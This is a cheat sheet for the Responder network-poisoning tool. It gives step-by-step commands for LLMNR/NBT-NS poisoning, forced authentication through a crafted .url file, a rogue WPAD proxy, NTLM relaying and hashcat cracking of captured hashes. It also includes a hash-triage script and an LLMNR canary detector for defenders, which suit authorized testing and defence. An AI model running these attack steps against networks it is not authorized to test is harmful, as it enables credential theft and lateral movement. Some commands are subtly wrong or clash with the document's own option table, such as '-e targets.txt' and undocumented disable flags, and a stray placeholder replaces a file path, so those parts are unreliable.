Responder Cheat Sheet
Overview
Responder is a powerful LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service) and mDNS (Multicast DNS) poisoner. It is designed to answer specific network name-resolution queries and includes built-in HTTP/SMB/MSSQL/FTP/LDAP authentication servers that support NTLMv1/NTLMv2/LMv2 authentication.
Warning: Responder is a security-testing tool that should only be used in environments where you have explicit permission to do so.
Installation
Kali Linux
```bash
# Update package list
sudo apt update
# Install if not already installed
sudo apt install responder
```
From GitHub
```bash
# Clone the repository
git clone https://github.com/lgandx/Responder
# Navigate to the directory
cd Responder
# Make the Python script executable
chmod +x Responder.py
```
Using pip
```bash
# Install using pip
pip install Responder
```
Basic usage
Starting Responder
```bash
# Basic usage with interface specification
responder -I eth0
# Start with all options enabled
responder -I eth0 -wrf
# Analyze mode (passive)
responder -I eth0 -A
```
Command-line options

| Option | Description |
|---|---|
| `-h, --help` | Show help message and exit |
| `-A, --analyze` | Analyze mode. Do not poison any requests, just analyze traffic |
| `-I <interface>` | Network interface to use |
| `-i <IP>` | IP address to bind to |
| `-e <IP>` | External IP address (for DHCP options) |
| `-b, --basic` | Return a Basic HTTP authentication. Default: NTLM |
| `-r, --wredir` | Enable answers for netbios wredir suffix queries |
| `-d, --NBTNSdomain` | Enable answers for netbios domain suffix queries |
| `-f, --fingerprint` | Fingerprint hosts that issued an NBT-NS or LLMNR query |
| `-w, --wpad` | Start the WPAD rogue proxy server |
| `-u, --upstream-proxy` | Upstream HTTP proxy used by the rogue WPAD proxy |
| `-F, --ForceWpadAuth` | Force NTLM/Basic authentication on wpad.dat file retrieval |
| `-P, --ProxyAuth` | Force NTLM/Basic authentication for any proxy request |
| `-lm, --LM` | Force LM hashing downgrade for Windows XP/2003 and earlier |
| `-v, --verbose` | Increase verbosity |
| `--log-local` | Log to file in addition to console |
| `-s, --disable-syslog` | Do not log to syslog |
| `-S, --disable-stdout` | Do not log to stdout |
| `-c, --config` | Path to configuration file |
| `--server=SERVER` | Enable/disable specific server (HTTP, SMB, etc.) |
| `--sql` | Enable the MSSQL server |
| `--mssql` | Enable the MSSQL server |
| `--https` | Enable the HTTPS server |
| `--http` | Enable the HTTP server |
| `--smb` | Enable the SMB server |
| `--ftp` | Enable the FTP server |
| `--imap` | Enable the IMAP server |
| `--pop` | Enable the POP server |
| `--smtp` | Enable the SMTP server |
| `--ldap` | Enable the LDAP server |
| `--dns` | Enable the DNS server |
Configuration file
The configuration file is located at __CODE_BLOCK_52_ or in the Responder directory as `Responder.conf`.
Key configuration options
```ini
[Responder Core]
; Set to On or Off to enable or disable features
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
```
Attack scenarios
Basic LLMNR/NBT-NS poisoning
```bash
# Start Responder with default settings
responder -I eth0 -v
# Wait for authentication attempts
# Hashes will be saved in the logs directory
```
Forced authentication via UNC path
```bash
# Create a file with a UNC path
echo "file://<non-existent-share>/test.txt" > malicious.url
# Start Responder
responder -I eth0 -v
# When the victim opens the file, their system will attempt to authenticate
# Responder will capture the hash
```
WPAD attack
```bash
# Start Responder with WPAD enabled
responder -I eth0 -w -v
# When a victim's browser requests a WPAD configuration file
# Responder will respond and capture authentication attempts
```
Relay attack setup
```bash
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run ntlmrelayx
ntlmrelayx.py -t <target_ip> -smb2support
```
Hash capture and cracking
Viewing captured hashes
```bash
# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt
# Format of captured hash
# USERNAME::DOMAIN:challenge:NTLM response:other data
```
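When an authorized test produces these log files, the blue team's job is to turn them into a remediation list: which accounts leaked a response (and must rotate passwords), which hosts still negotiate NTLMv1, and whether the server challenge is the fixed value shown in this cheat sheet's configuration example (also the value Responder ships with, which makes it a useful signature in NTLM traffic). The triage script below is an added example, not part of Responder or of the original cheat sheet. The log-filename pattern is generalised from `SMB-NTLMv2-SSP-<IP>.txt` above and is an assumption, the NTLMv1/NTLMv2 field layouts are the hashcat `-m 5500`/`-m 5600` formats, and all sample capture lines are constructed.

```python
"""Triage Responder hash logs for remediation (added example, not Responder code)."""
import re
from collections import Counter

# Challenge shown in this cheat sheet's configuration example; it is also the
# value Responder ships with, so seeing it on the wire is a strong indicator.
DEFAULT_CHALLENGE = "1122334455667788"
HEX = re.compile(r"^[0-9a-fA-F]+$")
# Assumed log-file name pattern, generalised from SMB-NTLMv2-SSP-<IP>.txt above.
LOGNAME = re.compile(
    r"^(?P<proto>[A-Za-z]+)-(?P<ver>NTLMv[12]|LMv2)(?:-SSP)?-(?P<ip>[0-9a-fA-F.:]+)\.txt$")


def parse_hash_line(line: str):
    """Classify one capture line as NTLMv1 or NTLMv2 and extract its fields."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        return None  # not a USER::DOMAIN:... line
    user, _, domain, f3, f4, f5 = parts
    if len(f3) == 16 and len(f4) == 32 and HEX.match(f3) and HEX.match(f4):
        # USER::DOMAIN:serverchallenge:NTProofStr:blob   (hashcat -m 5600)
        return {"user": user, "domain": domain, "version": "NTLMv2",
                "challenge": f3.lower(), "hashcat_mode": 5600}
    if len(f3) == 48 and len(f4) == 48 and len(f5) == 16 and HEX.match(f5):
        # USER::DOMAIN:LMresponse:NTresponse:serverchallenge   (hashcat -m 5500)
        return {"user": user, "domain": domain, "version": "NTLMv1",
                "challenge": f5.lower(), "hashcat_mode": 5500}
    return None


def client_ip_from_logname(filename: str):
    """Recover the client IP that Responder encodes in the log-file name."""
    m = LOGNAME.match(filename)
    return m.group("ip") if m else None


def triage(captures):
    """captures: iterable of (filename, line). Returns a remediation summary."""
    accounts, ntlmv1, machine = set(), set(), set()
    default_challenge, per_host = 0, Counter()
    for filename, line in captures:
        rec = parse_hash_line(line)
        if rec is None:
            continue
        name = f"{rec['domain']}\\{rec['user']}"
        accounts.add(name)
        if rec["user"].endswith("$"):
            machine.add(name)  # computer account: password rotates automatically
        if rec["version"] == "NTLMv1":
            ntlmv1.add(name)  # host still allows the weak, relayable/crackable version
        if rec["challenge"] == DEFAULT_CHALLENGE:
            default_challenge += 1
        ip = client_ip_from_logname(filename)
        if ip:
            per_host[ip] += 1
    return {
        "accounts": sorted(accounts),
        "rotate_passwords": sorted(accounts - machine),
        "machine_accounts": sorted(machine),
        "ntlmv1_accounts": sorted(ntlmv1),
        "default_challenge_lines": default_challenge,
        "captures_per_client": dict(per_host),
    }


# CONSTRUCTED sample log content: hex fields are filler, not real responses.
SAMPLE_CAPTURES = [
    ("SMB-NTLMv2-SSP-192.168.1.10.txt",
     "alice::CORP:1122334455667788:" + "a1" * 16 + ":" + "0101000000000000" + "00" * 24),
    ("SMB-NTLMv1-SSP-192.168.1.11.txt",
     "bob::CORP:" + "b2" * 24 + ":" + "c3" * 24 + ":1122334455667788"),
    ("HTTP-NTLMv2-192.168.1.12.txt",
     "WS01$::CORP:8899aabbccddeeff:" + "d4" * 16 + ":" + "0101000000000000" + "00" * 24),
    ("SMB-NTLMv2-SSP-192.168.1.10.txt", "garbage line that is not a hash"),
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_CAPTURES).items():
        print(f"{key}: {value}")
```

To run it over a real engagement's output, feed `triage()` with `(os.path.basename(path), line)` pairs read from the logs directory; the NTLMv1 list is the one to act on first, since those hosts need the LmCompatibilityLevel fix in addition to the password rotation.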
Cracking with Hashcat
```bash
# Crack NTLMv2 hashes with hashcat
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt /path/to/wordlist
# Crack NTLMv1 hashes with hashcat
hashcat -m 5500 /usr/share/responder/logs/SMB-NTLMv1-SSP-<IP>.txt /path/to/wordlist
```
Advanced techniques
Using Responder with MultiRelay
```bash
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run MultiRelay
cd Responder/tools
python3 MultiRelay.py -t <target_ip> -u ALL
```
Poisoning specific hosts
```bash
# Create a file with target IPs
echo "192.168.1.10" > targets.txt
# Start Responder with target file
responder -I eth0 -v -e targets.txt
```
Custom challenge value
```ini
; Edit Responder.conf and set a custom challenge
[Responder Core]
Challenge = 1122334455667788
```
Defensive measures
Disabling LLMNR via Group Policy
- Open the Group Policy Editor
- Navigate to Computer Configuration > Administrative Templates > Network > DNS Client
- Set the "Turn off multicast name resolution" policy to Enabled
Disabling NBT-NS via Command Line
```cmd
REM Disable NetBIOS over TCP/IP on adapters still using the default (DHCP-controlled) setting.
REM netsh has no NetBIOS switch, so the WMI SetTcpipNetbios method is used instead (2 = disabled).
wmic nicconfig where TcpipNetbiosOptions=0 call SetTcpipNetbios 2
```
Disabling NBT-NS via Registry
```
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\NodeType = 2 (P-node)
```
Detecting Responder activity
```bash
# Monitor for suspicious LLMNR/NBT-NS responses
# Look for multiple services running on the same IP
# Check for unusual authentication attempts
```
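The first of those points can be made concrete with a canary probe, the approach LLMNR honeypot detectors use: LLMNR reuses the DNS wire format on UDP/5355, and a query for a hostname that does not exist must get no answer, so any host that returns an address for it is answering every name and is almost certainly a poisoner. The script below is an added example, not Responder's code nor part of the original cheat sheet. The canary name is a hypothetical, randomly generated label, the multicast group and port are the LLMNR constants, and the sample response used for offline testing is constructed to look like what a poisoner would send.

```python
"""Detect LLMNR poisoning with canary queries (added example, not Responder code)."""
import random
import socket
import struct

LLMNR_GROUP = "224.0.0.252"  # LLMNR IPv4 multicast group
LLMNR_PORT = 5355


def encode_name(name: str) -> bytes:
    """Encode a hostname as DNS labels: length byte + label, zero terminated."""
    return b"".join(bytes([len(p)]) + p.encode("ascii") for p in name.split(".")) + b"\x00"


def build_llmnr_query(name: str, txid: int) -> bytes:
    """Standard LLMNR A query: 12-byte header, one question, no answers."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def decode_name(data: bytes, offset: int):
    """Decode a DNS name (following 0xC0 compression pointers); return (name, next_offset)."""
    labels, end, jumped = [], offset, False
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:  # pointer to an earlier copy of the name
            if not jumped:
                end = offset + 2
            jumped = True
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)


def parse_llmnr_response(data: bytes) -> dict:
    """Return transaction id, response flag, queried name and answered IPv4 addresses."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    offset, qname, addrs = 12, None, []
    for _ in range(qdcount):
        qname, offset = decode_name(data, offset)
        offset += 4  # skip QTYPE and QCLASS
    for _ in range(ancount):
        _, offset = decode_name(data, offset)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        if rtype == 1 and rdlen == 4:  # A record
            addrs.append(socket.inet_ntoa(data[offset:offset + 4]))
        offset += rdlen
    return {"txid": txid, "is_response": bool(flags & 0x8000), "name": qname, "addrs": addrs}


def is_poisoning(canary: str, txid: int, data: bytes) -> bool:
    """True when `data` positively answers our canary query; no legitimate host should."""
    try:
        r = parse_llmnr_response(data)
    except (struct.error, IndexError, UnicodeDecodeError):
        return False  # malformed or truncated packet, not a usable answer
    return (r["is_response"] and r["txid"] == txid
            and (r["name"] or "").lower() == canary.lower() and bool(r["addrs"]))


def build_sample_response(query: bytes, answer_ip: str) -> bytes:
    """CONSTRUCTED test data: the kind of answer a poisoner returns for any name."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)  # QR bit set, one answer
    answer = b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton(answer_ip)
    return header + query[12:] + answer


def probe(timeout: float = 2.0) -> list:
    """Send one canary query to the LLMNR group; return source IPs of poisoned answers."""
    canary = "canary-%08x" % random.getrandbits(32)  # hypothetical name, never a real host
    txid = random.getrandbits(16)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    hits = []
    try:
        sock.sendto(build_llmnr_query(canary, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src, _) = sock.recvfrom(512)
            if is_poisoning(canary, txid, data):
                hits.append(src)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


if __name__ == "__main__":
    for ip in probe():
        print("possible LLMNR poisoner answering canary queries:", ip)
```

Run `probe()` periodically from a host on each monitored segment and alert on any returned address; because the queried name is random, a legitimate resolver has nothing to answer, so false positives are rare, and the source IP is the host to investigate.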
Troubleshooting
Common issues
- **Port conflicts**
  ```bash
  # Check if ports are already in use
  netstat -tuln | grep -E '445|80|53'
  # Kill conflicting processes
  sudo kill <PID>
  ```
- **Interface not found**
  ```bash
  # List available interfaces
  ip a
  # Use the correct interface name
  responder -I <interface>
  ```
- **Permission issues**
  ```bash
  # Run with sudo
  sudo responder -I eth0
  ```
- **No hashes captured**
  ```bash
  # Check if Responder is running in analyze mode
  # Ensure the network allows the required traffic
  # Try forcing authentication with UNC paths
  ```
Resources
- Official GitHub repository
- MITRE ATT&CK - LLMNR/NBT-NS Poisoning
- Kali Linux Tools - Responder

*This cheat sheet provides a complete reference for using Responder in security-testing scenarios. Always make sure you have proper authorization before using this tool in any environment.*